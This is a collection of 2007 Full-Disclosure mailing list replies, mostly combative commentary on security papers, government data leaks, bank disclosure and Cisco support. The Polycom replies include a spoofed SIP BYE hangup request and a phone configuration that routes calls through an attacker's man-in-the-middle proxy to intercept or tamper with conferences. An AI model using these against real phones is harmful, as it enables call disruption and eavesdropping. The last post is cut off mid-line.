Re: [Full-disclosure] [Mlabs] Scrutinising SIP Payloads - Someone break his e-kneecaps please
First of all you should credit ALL the individuals, companies and sites you rip your information from else its called plagiarism On Page 12. Word for word you simply copied: http://www.cisco.com/en/US/docs/voice_ip_comm/sip/proxies/2.0/release/notes/stnSolRn.html Temper the contents and make it work according to attackers usage. What the hell are you talking about... You stated The Cisco proxy server does not accept calls after 150 cps I don't know what the hell you were using but Netra's can easily push in upwards of CPS, IBM X's 1000 via udp, 200+ via tcp... On Page 19 you stated Wiretapping Attacks: These are the generic class of attacks which take place when modification of communication channel is done by an attacker between two parties. ... Really? So when I'm running VoIPong and nothing is getting modified yet I'm steady recording a conversation what is this called. An unmodified wiretapping attack. That paper was yet another waste of time for me to read. Instead of copying and pasting to your hearts content and putting together something that makes sense only to you, why don't you first try to understand 1) what the hell you're talking about 2) what the hell you're writing about 3) what the protocol truly does and then - what attacks are possible based on something you truly know - as opposed to something you may think sounds logical. Page 28: It can be exploited by the attackers to have Denial of service attacks. The mechanism starts from the payload designing. The actual infection starts or is mainly coded in the payload itself by the attackers. What kind of high potent hashish are you smoking? Outside of these ignorant assumptions you make based on what I infer as an overall lack of knowledge on the subject, I could barely skim through the rest of your document since it was mainly terrible english with huge chunks of copied RFC material and ramblings that made zero sense. Nothing worth noting - other than me repeating in my head this jackass should STFU and learn what he's talking about instead of making an idiot out of himself And I don't mean to sound harsh - well yea I do, but that's irrelevant. What you're doing is flooding the industry with bullshit documents that those without a clue might read and become even more clueless. Please stop your ramblings. J. Oquendo Excusatio non petita, accusatio manifesta http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E sil . infiltrated @ net http://www.infiltrated.net smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Symantec Contact?
What's really Sad is that Symantec does not have an option for the general public (i.e. Independent Virus Researchers) to submit virus samples . You have to either A. Submit it through their product. B. Have a Corporate Support contract. Guess they don't want new samples. On the devil's advocate side, maybe they don't have it since it would be trivial for a virus creator to flood them with bogus information. Its easy to point a finger and say shame shame shame on you guys. You guys blow, foobar, cry, but I've yet to have an instance where I was looking for a point of contact at a vendor and not found one. Most times I get the impression the (l)user on the mailing list disclosing sends out one email knowing damn well the ratio for a response will be low - especially when a response was sent to abuse or contact or some other generic account. They then run along to a mailing list(s) then cry foul Vendor absent. Typical nowadays when many that I've seen come and go never learning much other than how to be a PACH. (buzzword - Point And Click Hacker). -- J. Oquendo Excusatio non petita, accusatio manifesta http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E sil . infiltrated @ net http://www.infiltrated.net smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Pro US government hackerganda
jf wrote: Well either you're full of it, they're full of it, or you just plainly misunderstood. In every place I've ever seen TS data getting transmitted, they're not using any cipher you've ever heard of, both ends of the connection use something like a kg-175 (now known as a taclane, you're lie would've been better if you had found out about these in your time spent using google), which uses NSA encryption and because of the crypto-module, is classified. Oh right every single department in the government and agency has one along with with kiv-19's because after all everyone connects back to DREN. Right I forgot its all over TRADOC manuals. How stupid can I be to not know this (http://web.archive.org/web/*/http://venona.antioffline.com) my bad. Now what's possible (assuming this isnt the figment of your imagination), is that they were transmitting data rated at secret, which IIRC can use AES 128, depending on the implementation. So like I said, you're either making it up, misunderstood them, or they were having fun with you. No they were deathly serious about using EV-DO to transmit Top Secret documents over the wire and wanted to know it was sniffable period. So what, you think because you found some documents on google that this is how the data is getting lost and this all somehow makes you authoritive? Here is the simple truth, as is the usual with many of you ex-feed-the-goats/etc kids, you just don't know wtf you're talking about. Documents on Google? One in the government shouldn't be worried about documents on Google they should be worried about idiots behind some of those government machines which leave information not intended for the public on them. [1] I recall back in the mid to late 90's mirrors of dozens maybe hundreds of military, NASA sites left and right getting pwnd daily, hourly. Why these machines were up and on the Internet is anyone's guess from the public side. As to why someone would compromise them, the answer should be obvious to anyone with half a clue. It's alright to vent your frustration but I'm not the idiot putting up machines on the Internet when they shouldn't be there. I'm not the one who's allowing idiots to post classified information over non secure channels when they should know better. Facts are facts. Don't shoot the messenger: // begin [1] Numerous US military documents, some of which have critical strategic importance, have been found on publicly accessible ftp servers. ... Some of the most sensitive information found by AP included details of security vulnerabilities at a contingency operating base, security features at Tallil Air Base and plans of a military fuelling facility. Some files were apparently password protected, but in one case the password was given in another document on the same server. When asked for his views, Bruce Schneier called the leaks a sloppy user mistake - an understatement of monumental proportions ... http://www.heise-security.co.uk/news/92653 // end Some files were apparently password protected, but in one case the password was given in another document on the same server. What's that you were saying about stupidity? -- J. Oquendo Excusatio non petita, accusatio manifesta http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E sil . infiltrated @ net http://www.infiltrated.net smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] RFP Interview
The legend behind responsible full (responsible) disclosure - something which so many retards new to the industry have yet to learn - answered some qa's for those interested. Mainly for those more in tuned with full disclosure not fool disclosure. http://www.infiltrated.net/?p=25 J. Oquendo Excusatio non petita, accusatio manifesta http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E sil . infiltrated @ net http://www.infiltrated.net smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Pro US government hackerganda
You're suffering from a logical falicy, I worked in that arena (albeit it a different agency) in incident response for quite some time Nice to know. I hope my government can either install ispell or send some of you guys to Clueful University. of workstations and servers on a regular basis and downloaded everything that ended in extensions like .pdf, .eml, .doc, et cetera, it wouldn't take that long to get up to very high numbers. This is exactly what has occurred and makes your assertion that of ignorance and presumption. So again, look at the statement from the previous article where the boys from this gov state NIPR. Translation? Shit anyone can find on Google.com/unclesam You again fall victim to foolish ignorance and presumption, just because a red network isn't connected, doesn't mean a yellow network isn't. I can't speak for DoD in that sense, I just know how it works in other agencies. I just know how it works in other agencies Not knowing, isn't this the same quote on quote ignorance you accused me of. If you don't know I would Google STFU if you haven't already heard/been told the term. Furthermore, with ratings like SBU/et cetera, and lots of it, you can gain valueable intelligence by combining all of it. Irrelevant to what the government has stated. China has hacked TERABYTES OF DATA ... Define hacked. Google hacked? How about gov employees get a clue before they decide to leave top secret information on a non secure webserver. Here is one for you from the horses mouth. 100% true so help me any deity. So I get a group of individuals visit my company about two weeks ago. Golf shirts slacks, etc., really clean cut. Nice little blue and white plates can be seen from the conference room with a big old G on it. They start asking about pentesting EV-DO... They ramble on and mention we're using 128 bit... Wait a minute I told the gentleman. You know you shouldn't be using 128 bit for encryption of TS documents in according with NIST. (And I know this because I got a personal schooling from Bruce Schneier on this. (http://www.cnss.gov/Assets/pdf/cnssp_15_fs.pdf for clarity on this)) Their response: We know but we have M16's on each side of the stream and they chuckled. My thoughts at that time... What a bunch of idiots. So what. M16's mean nothing if you can't track someone sniffing you - you idiot... In essence its stupid - and I sincerely and obnoxiously mean this - STUPID IDIOTS in the government who allow these so called pseudoIntrusions (add that to your buzzwords too). See an intrusion hasn't occurred here period, error and human stupidity has though and now the US government is calling the kettle black. In case you have either forgotten or never heard of the abuses of ECHELON not to even bother pointing out the mess we have in this country with our warrantless MM color coded uberDuber terrorAlert crapaganda systems. So politics aside, its stupidity black and white, not an intrusion that is leading to the compromise of data. If the data is on unsecured webservers that are on the Internet, don't blame the ingenuity of someone for finding something that should have been on SIPR instead of being online (NIPR) to the public in the first place. The gov should re-iterate the differences between SIPR, NIPR, RIPR and other systems to clueless idiots on computers, servers, crackberries or whatever other mediums they choose to use. -- J. Oquendo Excusatio non petita, accusatio manifesta http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E sil . infiltrated @ net http://www.infiltrated.net smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Pro US government hackerganda
lostzero wrote: You're looking at it from the wrong view. The 20 terabytes didn't happen overnight. Without a starting time frame you have no idea how many years it has been happening. Not to mention they have workstations and servers all over the world. Which means no 1 agency or individual looks at all the traffic from all the locations at the same time. If your network produced terabytes of traffic a day, 50-100mb isn't that eye catching. Again many of you seem to be missing the bottom line here... oh noes deesa been from a many machines massa. Irrelevant. If someone is coming into a GOVERNMENT AGENCY those machines with classified information should be LOGGING and those LOGS should be MONITORED as per GOVERNMENT rules. So whatever someone feels should have could have would have is all irrelevant. There are rules set up for those in office to follow. They're not being followed. Start threatening some of these people with penalties I guarantee you that lazy ass SMSGT won't decide Gee... I think I'll put this Top Secret document on a public webserver so I can see it later from home... won't occur. -- J. Oquendo Excusatio non petita, accusatio manifesta http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E sil . infiltrated @ net http://www.infiltrated.net smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Pro US government hackerganda
Robert Lemos wrote: In this case, without judging how truthful the Chinese are being Hackerganda... Buzzword? Who cares. Lets play Politrix, here goes... China has downloaded 10 to 20 terabytes of data... said Maj. Gen. William Lord, director of information, services and integration in the Air Force’s Office of Warfighting Integration and Chief Information Officer, during the recent Air Force IT Conference in Montgomery, Ala. (http://www.computerworld.com/blogs/node/3320) 1) 10 - 20 terabytes? Undetected? What a marvelous feat. What kind of connection did they have to do this without being detected since they bbviously they went undetected for at minimum, 10 terabytes of data according to this quote. Who was watching logs? Were they asleep at the wheel too a-la 9/11 pseudointelligence agencies. Maybe China borrowed Peter Lothberg's mothers backbone to do this (http://slashdot.org/articles/07/07/12/1236231.shtml) 2) Notice how the remainder of the quote was left off? Here it is in full: “China has downloaded 10 to 20 terabytes of data from the NIPRNet (DOD’s Non-Classified IP Router Network),” Funny NIPRnet is unimportant information in fact a majority of it can be found via www.google.com/unclesam Outside of this play on words in all honesty if the US government gets its information stolen then they deserve it. What the hell am I paying uber taxes for outside of the War in Vietnam2k. Here is a story since people will make what they want out of it. Story goes, a friend was talking to another friend who happened to be a platoon leader in Iraq. The military friend spoke in angst to his friend because his squadron was sending out orders to each other pre-tour via hotmail and IM. Secret, Top Secret information... All went out via non secure channels. Hows that for security. How about those moronic diplomats who confused anonymity with security and were logging into their email accounts with a tor proxy. Hrmm... torny# whoami root torny# cd /usr/local/squid/logs/ torny# ls -ltha cache.log -rw-r- 1 squid squid40K Sep 6 09:49 cache.log torny# ls -ltha store.log -rw-r- 1 squid squid 602K Sep 13 11:16 store.log torny# tail -n 2 store.log 1189611525.071 RELEASE -1 B8721ECBA84E697E3D431CC57BEF9972 200 1189611784-1-1 text/plain -1/138 GET http://www.google.com/tools/swg2/update? 1189700157.679 RELEASE -1 28228FB9480AEE7916FD738A209C6027 200 1189700417-1-1 text/plain -1/138 GET http://www.google.com/tools/swg2/update? Funny thing is I leave this opened purposely as part of a honeypot. Never have I used my squid proxy server but guess what: torny# grep login store.log 1187186702.458 RELEASE -1 0EE6D49B3E4BA072166EBF15AAF26ABE 200 1187187634-1 375007920 text/html 599/599 POST http://xxx.x.mil/mail/login.asp Wait... Am I running an [EMAIL PROTECTED]@%$ ... The government needs to get their stuff together period. As for the hey chinese hax0red our google.gov toolbar ... no USA hacker Chinese Great Steamed Dumplings BS its all political chess. If the US truly wanted to stop it they COULD (note the word COULD), question should be do they really want to or are they (the US) simply filling these vulnerable machines with honeypot garbage material. -- J. Oquendo Excusatio non petita, accusatio manifesta http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E sil . infiltrated @ net http://www.infiltrated.net smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Came across this site
Brian Toovey wrote: At the risk of getting flamed... At the risk of cry babies whining I shall chime in. Oct 2007 Infiltrated dot net will take off where I left AntiOffline off in 2001. After reading so many shitty websites with distorted views of security in general, I decided to bring back the In Your Face news and Interviews of yestermillenium. It won't be geared towards luzer assed look at me grep -i passwd *.php|echo l33t [EMAIL PROTECTED] but more towards interviews with people I find make the security scene worthwhile. My own personal, obnoxious, clueless ramblings, and outakes on security in general. For those on the scene pre-2001 keep on the look out for a top ten questionnaire coming to your mailboxes. For those under the age of tenteen, still in high school, freshmen/sophomores in college and romper room kiddiots keep away. Stay tuned. J. Oquendo Excusatio non petita, accusatio manifesta http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E sil . infiltrated @ net http://www.infiltrated.net smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] World's most powerful supercomputer goesonline (fwd)
[EMAIL PROTECTED] wrote: Uh... I think you're missing some key points about the gov't and the internet. First off, all methods of connecting to the internet (cable, DSL, etc) invariably fall under the control of the FCC. Oh really all of the methods. Including those outside of the juridstiction of United States laws. This is certainly news to me and I'm sure its also news to many other persons and countries outside of the United States. -- J. Oquendo Excusatio non petita, accusatio manifesta http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E sil . infiltrated @ net http://www.infiltrated.net ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Interesting fun with Cisco VPN Client Privilege Escalation Vulnerabilities
James Lay wrote: You'll need a LOT more then just the site and serial number...you'll need to be registered with Cisco or provide them with: REQUIRED INFORMATION * CONTACT NAME: * CONTACT PHONE NUMBER: * CONTACT CISCO.COM USERID (if one exists): * CONTACT EMAIL ADDRESS: * CONTRACT #: * SERIAL #: * PRODUCT TYPE (Model Number): * SOFTWARE VERSION: * COMPANY NAME: * EQUIPMENT LOCATION (Address): * BRIEF PROBLEM DESCRIPTION: And? The problem is what? I've had firmware upgrades done via the TAC without a contract before. I've had firmware updates done via the TAC on stuff I bought from eBay too. Pain in the ass yes, impossible, no. Might take a little gift to gab, but I can tell you I've gotten what I needed when I needed it and I have enough Cisco crap lying around to disprove this message the world over. (http://www.infiltrated.net/rewired/ not even up-to-date at this point) The product that you requested support for is an older product that has passed the warranty period date for that product. Once a product becomes End of Sale, it is supported for three years beyond the End of Sale date and then becomes End of Support. End of Support is self explanatory. Do you expect any vendor to go backwards. What incentives do they have to do so. It would be more costly for most to do so, use some common sense, its not like they will have product X still being sold be a re-seller to support it. They gave you X amount of time notice that X product is at the EOS stage, then told you look its EOS but we'll still deal with it for 3 years after that. Plan ahead. The last gig is: The Cisco VPN Client for Windows is available for download from the following location on cisco.com: http://www.cisco.com/pcgi-bin/tablebuild.pl/windows?psrtdcat20e2 Heh..nothing there. Interesting...VERY interesting ;) Apparently you had difficulty reading (or including) the entire print: http://www.cisco.com/en/US/products/sw/secursw/ps2308/index.html The Cisco VPN Client is included with all models of Cisco VPN 3000 Series concentrators and Cisco ASA 5500 Series security appliances (excluding ASA 5505), and most Cisco PIX 500 security appliances. Customers with Cisco SMARTnet® support contracts and encryption entitlement may download the Cisco VPN Client from the Cisco Software Center at no additional cost. For customers without Cisco SMARTnet support contracts, a media CD containing the client software is available for purchase. This CD does not provide access to the most current patch releases. Do you have a Smart Net contract, if so, guess what, its free to download, if not, pay for the cd... No voodoo in those words. Would be a different story had you posted I logged in with my Smart Net and there is nothing there what gives!. Anyway... So how was this relevant to any form of full-disclosure I ask since puzzled me a little. Who knows I just keep reminding myself of my my dyslexia (fool||full-disclosure), keeps me stable. -- J. Oquendo Excusatio non petita, accusatio manifesta http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E sil . infiltrated @ net http://www.infiltrated.net smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SecNiche : Microsoft Internet Explorer Pop up Blocker Bypassing and Dos Vulnerability
Aditya K Sood wrote: Embarrassment. Nothing lies beneath it. Critically your are too much at of your own in deciding. Personally, this is just another kiddiot on my filters. I only see the residue of responses to him. I believe every single advisory this *person* (play nice now) has sent out has 1) never been verified 2) never been worthwhile 3) repeat steps 1 and 2. I plan to release some advisories myself too sometime this millenium. I found that if you allowed these miserable posts to fill your mailbox, your machine will fill up space... Then crash... And crashing is a bad thing. Which is a DoS. Which is evil. Translation... Re-blocking APNIC and RIPE ranges. Evil hackers out there. Pop Up blockers... Scare-e... IE? I'm so owned as of last weekend months ago. -- J. Oquendo Excusatio non petita, accusatio manifesta http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E sil . infiltrated @ net http://www.infiltrated.net smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] intrusion kit
Joshua Tagnore wrote: unzip kit.zip cd nmap nmap -sS localhost cd .. cd vnc run-vnc-server Does this exist? Could anyone please share his experience with this problems ? I have one I will be throwing up for sale on eBay to the highest suc... bidder. Not only will it do what you just asked for, but here is a complete list of what it will do: Detect and covertly bypass firewalls Detect and covertly bypass infrared sensors Detect and play cards with IPS/IDS' Detect and remove Harry Potter related stolenware And, if you act now and become the highest bidder, it will even let you ǝlzzıu ɥɐɯ ǝlzzıɥs ʇǝǝɹǝ ɹǝdns ǝɯos op -- J. Oquendo Excusatio non petita, accusatio manifesta http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E sil . infiltrated @ net http://www.infiltrated.net smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Wachovia Bank website sends confidential information
[EMAIL PROTECTED] wrote: On Tue, 10 Jul 2007 21:39:33 EDT, Jim Popovitch said: 7 days? industry practice? Come on Bob I know you know that large corporations can't feed a cat in 7 days let alone make unscheduled website changes that fast. Change control approvals alone would include 14 or more days in most enterprises. Why the rush to say so? On the other hand, I think that they *could* manage at least a Wow d00dz, we really *do* have a hole there reply and at least give a handwaving about when they'd fix it. Of course, actually *fixing* a design flaw that big is going to take them *months*. Driver walks into a dealer and speaks to customer service: These brake pads are extremely vulnerable to slipping during X conditions on a 90 degree slalom says the driver. Puzzled and not knowing squat about slaloms, or the breaking system, the customer service rep send the driver to a mechanic. These brake pads are extremely vulnerable to slipping during X conditions on a 90 degree slalom. Someone will die! says the driver to the mechanic... Not being able to change the auto's design nor engineering, the mechanic is puzzled and offers to take the information although he is even more puzzled on who this should be directed to. Two days later driver rambles on news stations nationwide: Their arrogance will get people killed. I warned them repeatedly People moan and grumble, etc., recalls, fixes... This Wachovia thread is pointless. I see no mention or posting to perhaps any security list (and I'm on many both public and private) saying: Hey is there anyone who can put me in touch with someone in the know at Wachovia on any list. All I see is... I called customer service. So what, if you're a security professional you will know damn well you're getting nowhere with them. I spoke to their w3bm4ster. And? Either the poster is looking for attention or a complete and utter idiot. If his or her true intention was to provide a report of a security woe concerning said business or product, he or she could have easily jumped on any security mailing list and found the right connection instead of rambling on the sky is falling... Let me see: wachovia security cissp incident +network via Google This looks interesting: http://www.bryceporter.com/ I would have contacted someone on this level to put me in touch with the right person. But hey, guess its more hip to add stupid little tags next to your resume or webpage: I broke $INSERT_VENDOR_HERE -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 echo infiltrated.net|sed 's/^/sil@/g' Wise men talk because they have something to say; fools, because they have to say something. -- Plato smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Wachovia Bank website sends confidential information
Bob Bruen wrote: While it is true that lots of folk pick on vendors for a few minutes of fame, the Wachovia case is slightly different. They do have an attitude problem and are technically challenged. The basis for this is a law enforcement conference about six months ago. During a pressentation a Wachovia representative told a speaker to stop blaming the banks for problems. This was the third presentation this individual has listened to in which each speaker had blamed the banks for not doing enough and the frustration level was a bit high. This only comes up because of the current Wachovia web site issue. It shows that there is an internal problem, worse than most, endind with the current situation. And no I will not indentify any of the players. --bob Mechanisms of politrix... I was doing contract work from home for a HUGE-O-MONGOUS tech company I won't name (NDA) and was assigned to do fw administration, configuration for a bank that outsource it to this HUGE-O-MONGOUS monster. When we needed to implement a change these were the steps: Uh oh.. We're seeing attacks from network X ... 1) Call manager 2) Manager calls his manager in another state 3) That manager calls sales rep 4) Sales rep called the bank's contact 5) Bank's contact called his security team 6) Hey security team, you need to speak with your contractors 7) Security team to bank's contact ok make a conference call 8) Bank's contact to the sales rep - ok make a conference call 9) bank sales rep to HUGE-O-MONGOUS' sales rep - ok make a conference call 10) manager to manager - hey we're going to do a conference call 11) No wait... My contractor is tied up... Can we re-schedule? In essence, when we needed to do things, it wasn't as cut and dry as I thought it would be. In fact it was downright frustrating. Here you are Rainwall open, NSM open about to fire off changes but have to wait for at minimum 4 business days hoping no one up the food chain was unavailable to make a mission critical change. Long story short, while at HUGE-O-MONGOUS I was surprised I was even given the opportunity to be there - but hey contractors liabilities, etc., legal foobarfoo wording exculpated HUGE-O-MONGOUS company from the whole shmoo (compsec historians know the HIStory), anyhow, I got frustrated working for them. I felt as if it was such a dead end. Mind you I was making about $80.00 per hour to roll out of bed and do work pretty much whenever I wanted. Sometimes, things aren't as clear cut as one may think they are. To me the initial Oh noes! Wachovia is evil post was nothing more than someone itching for their Andy Warhol 15 minutes. With that said... Off to lunch... -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 echo infiltrated.net|sed 's/^/sil@/g' Wise men talk because they have something to say; fools, because they have to say something. -- Plato smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)
Nick FitzGerald wrote: _AND_ at least they noticed and moved to act against it. Every day, many hundreds of thousands of _successful_ attacks against corporations, small businesses and private individuals not only go unreported by them, but entirely undetected and largely unnoticed by the _attacked_. The reason for this comment? A great many of those mocking the DHS over this incident are part of the group just mentioned and are too stupid to ever realize it... An also *informed* number of members realize the potential of gaining greater budgets by leaving machines vulnerable in an effort to lobby congress for yet more pork barrel money to secure these networks from uber hackers. So let's sift through crapaganda while its on the table shall we. /* SNIP */ “China has downloaded 10 to 20 terabytes of data from the NIPRNet (DOD’s Non-Classified IP Router Network),” said Maj. Gen. William Lord, director of information, services and integration in the Air Force’s Office of Warfighting Integration and Chief Information Officer, during the recent Air Force IT Conference in Montgomery, Ala. (http://www.gcn.com/print/25_25/41716-1.html) /* END SNIP */ 20 Terabytes huh. Unnoticed 20 terabytes? At that rate they would need some massive pipes to download this all undetected. Let's analyze the comment and the logic... 20 terabytes on an OC3 would take you 291 hours 44 minutes and 16 seconds give or take. Gigabit Ethernet, 45 hours 30 minutes and change... So how did they manage do achieve this marvelous feat of magic undetected. It obviously couldn't be at high speeds which means they would have had to either go on undetected for quite some time, or they embedded fiber taps INSIDE of a DoD location (doubtable). 20 terabytes... I'll tell you what I think usually happens with DoD and governmental sectors... Private corporations and those in them slacking (http://cryptome.org/cg-leakage.htm). Do I blame DoD, absolutely. I take a different view of this altogether under a what if I was a contractor with no one monitoring me... Dictating to secretary: We need another million for these uh golf... *scratch that* for these vertically integrated, high end clustered reverse path packet injection token based AES FIPS standardized firewalls. Its cutting edge technology which guarantees and mitigates against unauthorized intrusions. The government should undertake a *real* method to secure their infrastucture. Have it revamped by industry experts and implemented by those same experts. Not some deep pocket contractors who will skim so much of the money away and into accounts in the triple borders. (reality... like it or not) -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 echo infiltrated.net|sed 's/^/sil@/g' Wise men talk because they have something to say; fools, because they have to say something. -- Plato smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Polycom hacking
Paul Schmehl wrote: Is anyone aware of any work done in the field of hacking Polycom video-conferencing devices? Or any known hacks for Polycom devices? Hey Paul, I have a modified version of Asteroid lying on one of my servers that affected Polycoms, Snoms, Hitachi WiFi's, and possibly a few others. Offhand you could with high probability generate a hangup DoS if you know enough about the network topology. E.g.: BYE sip:victim.phone.com SIP/2.0 Via: SIP/2.0/TCP spoofed.pbx.server.com:5060 Max-Forwards: 70 From: Spoofed sip:spoofed.pbx.server.com To: VICTIM sip:[EMAIL PROTECTED] Call-ID: [EMAIL PROTECTED] CSeq: 1 BYE Content-Length: 0 You could take a look at Asteroid and target a Polycom with it. I haven't bothered much with them. Cisco's aren't vuln to much I've thrown at them yet. (greetings [EMAIL PROTECTED]). As for video (H323) check out voippong: You may be able to intercept the audio streams out of the conference depending on the setup. (Asterisk doesn't do H323)... Maybe a combination of Yates, VoIPPong and others. HTH http://www.enderunix.org/voipong/ http://www.infiltrated.net/asteroid/ http://www.voipsa.org/Resources/tools.php -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 echo infiltrated.net|sed 's/^/sil@/g' Wise men talk because they have something to say; fools, because they have to say something. -- Plato smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Polycom hacking
Paul Schmehl wrote: Thanks. I'm not that interested in DoSes, but I'm thinking that you could mget the entire contents, alter them to your satisfaction and then mput them. Don't know how much memory these things have yet, but you ought to be able to iframe silent installs of malware, script the capture of all audio and video traffic from/to the device, etc. Could be quite interesting. On that level you could just use a MITM proxy: phone.cfg (removed html brackets) xml version=1.0 encoding=UTF-8 standalone=yes phone102 reg reg.1.displayName=666 reg.1.address=666 reg.1.label=666 reg.1.type=private reg.1.lcs= reg.1.thirdPartyName= reg.1.auth.userId=666 reg.1.auth.password=666 reg.1.server.1.address=original.server.ip reg.1.server.1.port=5060 reg.1.server.1.transport=UDPonly reg.1.server.1.expires=1800 reg.1.server.1.expires.overlap= reg.1.server.1.register=1 reg.1.outboundProxy.address=man.in.the.middle.proxy reg.1.outboundProxy.port=5060 reg.1.outboundProxy.transport= reg.1.ringType=2 reg.1.lineKeys= reg.1.callsPerLineKey= // stripped the rest... Where reg.1.server.1.address= points back at their PBX/H323 server. The problem with this would lie on the networking side. Local without VLANs... Not a problem. Remotely, would take some work but its doable. Polycoms are horrible when it comes to doing network address translation and many set them up in dirty DMZ's to get them to work. Soundstations use the same XML files as the phones do. In sip.cfg: outboundProxy voIpProt.SIP.outboundProxy.address= voIpProt.SIP.outboundProxy.port=5060 voIpProt.SIP.outboundProxy.transport=DNSnaptr Obvious entries to fill... Would work like this: Registration and subsequent connection(s): Soundstation -- AttackerProxy -- RealServer With AttackerProxy looking at traffic you could recompile data, block hosts from the conference, inject new participants, etc. J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 echo infiltrated.net|sed 's/^/sil@/g' Wise men talk because they have something to say; fools, because they have to say something. -- Plato smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Squashing supposed hacker profiling
All female authors... Your so called gender guessing mechanism is flawed either way you want to cut it. You could try fuzzy math based on theories to profile anyone on this list, but unless you have feasible and PROVEN without reasonable doubt, its all a guessing game bottom line. Anyhow back to security, sociolinguistics is not meant for this list. According to Dr. Krawetz's Gender Guesser... (http://www.hackerfactor.com/GenderGuesser.html#Analyze) http://girlygeekdom.blogspot.com/ Genre: Informal Female = 104 Male = 602 Difference = 498; 85.26% Verdict: MALE Genre: Formal Female = 116 Male = 239 Difference = 123; 67.32% Verdict: MALE REALITY: WRONG http://www.darkreading.com/blog.asp?blog_sectionid=342WT.svl=blogger1_5 Genre: Informal Female = 442 Male = 555 Difference = 113; 55.66% Verdict: Weak MALE Genre: Formal Female = 364 Male = 570 Difference = 206; 61.02% Verdict: MALE REALITY: WRONG http://invisiblethings.org/papers/joanna-talk_description-CCC04.txt Genre: Informal Female = 218v Male = 1186 Difference = 968; 84.47% Verdict: MALE Genre: Formal Female = 414 Male = 576 Difference = 162; 58.18% Verdict: Weak MALE REALITY: WRONG http://www.techsploitation.com/2007/05/31/what-the-hell-was-i-thinking-about-green-libertarians/ (text by Sue Lange) Genre: Informal Female = 210 Male = 481 Difference = 271; 69.6% Verdict: MALE Genre: Formal Female = 260 Male = 408 Difference = 148; 61.07% Verdict: MALE REALITY: WRONG http://thelizardqueen.wordpress.com/2005/06/08/a-thoroughly-and-utterly-girly-blog-post-sorry-4/ Genre: Informal Female = 415 Male = 559 Difference = 144; 57.39% Verdict: Weak MALE Genre: Formal Female = 180 Male = 312 Difference = 132; 